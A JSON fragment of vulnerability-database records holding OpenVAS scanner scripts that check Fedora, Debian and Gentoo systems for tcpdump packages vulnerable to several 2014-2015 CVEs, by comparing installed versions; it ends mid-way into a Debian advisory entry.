"2018-09-01T23:54:55", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-12T00:00:00", "published": "2014-12-05T00:00:00", "id": "OPENVAS:1361412562310868548", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868548", "title": "Fedora Update for tcpdump FEDORA-2014-15549", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump FEDORA-2014-15549\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868548\");\n script_version(\"$Revision: 6692 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:57:43 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-12-05 05:19:41 +0100 (Fri, 05 Dec 2014)\");\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"Fedora Update for tcpdump FEDORA-2014-15549\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for monitoring network traffic.\nTcpdump can capture and display the packet headers on a particular\nnetwork interface or on all interfaces. 
Tcpdump can display all of\nthe packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 19\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2014-15549\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145201.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.4.0~4.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:52:22", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-10T00:00:00", "published": "2015-01-05T00:00:00", "id": "OPENVAS:1361412562310868783", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868783", "title": "Fedora Update for tcpdump FEDORA-2014-15609", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump FEDORA-2014-15609\n#\n# Authors:\n# System Generated Check\n#\n# 
Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868783\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-05 14:51:40 +0100 (Mon, 05 Jan 2015)\");\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"Fedora Update for tcpdump FEDORA-2014-15609\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for monitoring network traffic.\nTcpdump can capture and display the packet headers on a particular\nnetwork interface or on all interfaces. 
Tcpdump can display all of\nthe packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2014-15609\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-December/145449.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.6.2~2.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:53:53", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-19T00:00:00", "published": "2014-11-28T00:00:00", "id": "OPENVAS:1361412562310868523", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868523", "title": "Fedora Update for tcpdump FEDORA-2014-15541", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump FEDORA-2014-15541\n#\n# Authors:\n# System Generated Check\n#\n# 
Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868523\");\n script_version(\"$Revision: 6759 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-19 11:56:33 +0200 (Wed, 19 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-11-28 06:27:47 +0100 (Fri, 28 Nov 2014)\");\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"Fedora Update for tcpdump FEDORA-2014-15541\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for monitoring network traffic.\nTcpdump can capture and display the packet headers on a particular\nnetwork interface or on all interfaces. 
Tcpdump can display all of\nthe packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 20\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name: \"FEDORA\", value: \"2014-15541\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-November/144951.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.5.1~2.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-26T08:48:36", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. 
These\nvulnerabilities might result in denial of service, leaking sensitive information\nfrom memory or, potentially, execution of arbitrary code.", "modified": "2017-07-11T00:00:00", "published": "2014-12-03T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=703086", "id": "OPENVAS:703086", "title": "Debian Security Advisory DSA 3086-1 (tcpdump - security update)", "type": "openvas", "sourceData": "######################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3086.nasl 6663 2017-07-11 09:58:05Z teissa $\n# Auto-generated from advisory DSA 3086-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n###########################################################################\n\nif(description)\n{\n script_id(703086);\n script_version(\"$Revision: 6663 $\");\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\", \"CVE-2014-9140\");\n script_name(\"Debian Security Advisory DSA 3086-1 (tcpdump - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-11 11:58:05 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2014-12-03 00:00:00 +0100 (Wed, 03 Dec 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3086.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tcpdump on Debian Linux\");\n script_tag(name: \"insight\", value: \"This program allows you to dump\nthe traffic on a network. 
tcpdump is able to examine IPv4, ICMPv4, IPv6, ICMPv6,\nUDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS and many other\npacket types.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 4.3.0-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 4.6.2-3.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.6.2-3.\n\nWe recommend that you upgrade your tcpdump packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. These\nvulnerabilities might result in denial of service, leaking sensitive information\nfrom memory or, potentially, execution of arbitrary code.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.3.0-1+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:55:15", "bulletinFamily": "scanner", "description": "Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. 
These\nvulnerabilities might result in denial of service, leaking sensitive information\nfrom memory or, potentially, execution of arbitrary code.", "modified": "2018-04-06T00:00:00", "published": "2014-12-03T00:00:00", "id": "OPENVAS:1361412562310703086", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703086", "title": "Debian Security Advisory DSA 3086-1 (tcpdump - security update)", "type": "openvas", "sourceData": "######################################################################\n# OpenVAS Vulnerability Test\n# $Id: deb_3086.nasl 9354 2018-04-06 07:15:32Z cfischer $\n# Auto-generated from advisory DSA 3086-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n###########################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703086\");\n script_version(\"$Revision: 9354 $\");\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8769\", \"CVE-2014-9140\");\n script_name(\"Debian Security Advisory DSA 3086-1 (tcpdump - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2018-04-06 09:15:32 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value: \"2014-12-03 00:00:00 +0100 (Wed, 03 Dec 2014)\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-3086.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"tcpdump on Debian Linux\");\n script_tag(name: \"insight\", value: \"This program allows you to dump\nthe traffic on a network. 
tcpdump is able to examine IPv4, ICMPv4, IPv6, ICMPv6,\nUDP, TCP, SNMP, AFS BGP, RIP, PIM, DVMRP, IGMP, SMB, OSPF, NFS and many other\npacket types.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 4.3.0-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems have been\nfixed in version 4.6.2-3.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 4.6.2-3.\n\nWe recommend that you upgrade your tcpdump packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in tcpdump, a command-line network traffic analyzer. These\nvulnerabilities might result in denial of service, leaking sensitive information\nfrom memory or, potentially, execution of arbitrary code.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed software\nversion using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"tcpdump\", ver:\"4.3.0-1+deb7u1\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:49:18", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-10T00:00:00", "published": "2015-01-08T00:00:00", "id": "OPENVAS:1361412562310868908", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868908", "title": "Fedora Update for tcpdump FEDORA-2014-16823", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump 
FEDORA-2014-16823\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868908\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-01-08 05:56:04 +0100 (Thu, 08 Jan 2015)\");\n script_cve_id(\"CVE-2014-9140\", \"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_name(\"Fedora Update for tcpdump FEDORA-2014-16823\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help of detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for monitoring network traffic.\nTcpdump can capture and display the packet headers on a particular\nnetwork interface or on all interfaces. 
Tcpdump can display all of\nthe packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2014-16823\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-January/147734.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.6.2~3.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-10-29T12:40:06", "bulletinFamily": "scanner", "description": "Gentoo Linux Local Security Checks GLSA 201502-05", "modified": "2018-10-26T00:00:00", "published": "2015-09-29T00:00:00", "id": "OPENVAS:1361412562310121344", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310121344", "title": "Gentoo Security Advisory GLSA 201502-05", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: glsa-201502-05.nasl 12128 2018-10-26 13:35:25Z cfischer $\n#\n# Gentoo Linux 
security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.121344\");\n script_version(\"$Revision: 12128 $\");\n script_tag(name:\"creation_date\", value:\"2015-09-29 11:28:29 +0300 (Tue, 29 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-26 15:35:25 +0200 (Fri, 26 Oct 2018) $\");\n script_name(\"Gentoo Security Advisory GLSA 201502-05\");\n script_tag(name:\"insight\", value:\"Multiple vulnerabilities have been discovered in tcpdump:\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://security.gentoo.org/glsa/201502-05\");\n script_cve_id(\"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\", \"CVE-2014-9140\");\n script_tag(name:\"cvss_base\", value:\"6.4\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", 
\"ssh/login/pkg\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Gentoo Linux Local Security Checks GLSA 201502-05\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Gentoo Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\n\nif((res=ispkgvuln(pkg:\"net-analyzer/tcpdump\", unaffected: make_list(\"ge 4.6.2-r1\"), vulnerable: make_list(\"lt 4.6.2-r1\"))) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}\n", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:49:29", "bulletinFamily": "scanner", "description": "Check the version of tcpdump", "modified": "2017-07-10T00:00:00", "published": "2015-03-31T00:00:00", "id": "OPENVAS:1361412562310869148", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310869148", "title": "Fedora Update for tcpdump FEDORA-2015-4939", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for tcpdump FEDORA-2015-4939\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2015 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.869148\");\n script_version(\"$Revision: 6630 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:34:32 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-31 07:08:30 +0200 (Tue, 31 Mar 2015)\");\n script_cve_id(\"CVE-2015-0261\", \"CVE-2015-2154\", \"CVE-2015-2153\", \"CVE-2015-2155\",\n \"CVE-2014-9140\", \"CVE-2014-8767\", \"CVE-2014-8768\", \"CVE-2014-8769\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for tcpdump FEDORA-2015-4939\");\n script_tag(name: \"summary\", value: \"Check the version of tcpdump\");\n script_tag(name: \"vuldetect\", value: \"Get the installed version with the help\nof detect NVT and check if the version is vulnerable or not.\");\n script_tag(name: \"insight\", value: \"Tcpdump is a command-line tool for\nmonitoring network traffic. Tcpdump can capture and display the packet headers\non a particular network interface or on all interfaces. 
Tcpdump can display all\nof the packet headers, or just the ones that match particular criteria.\n\nInstall tcpdump if you need a program to monitor network traffic.\n\");\n script_tag(name: \"affected\", value: \"tcpdump on Fedora 21\");\n script_tag(name: \"solution\", value: \"Please Install the Updated Packages.\");\n script_xref(name: \"FEDORA\", value: \"2015-4939\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2015-March/153834.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC21\")\n{\n\n if ((res = isrpmvuln(pkg:\"tcpdump\", rpm:\"tcpdump~4.7.3~1.fc21\", rls:\"FC21\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "debian": [{"lastseen": "2018-10-16T22:13:15", "bulletinFamily": "unix", "description": "Package : tcpdump\nVersion : 4.1.1-1+deb6u1\nCVE ID : CVE-2014-8767 CVE-2014-8769 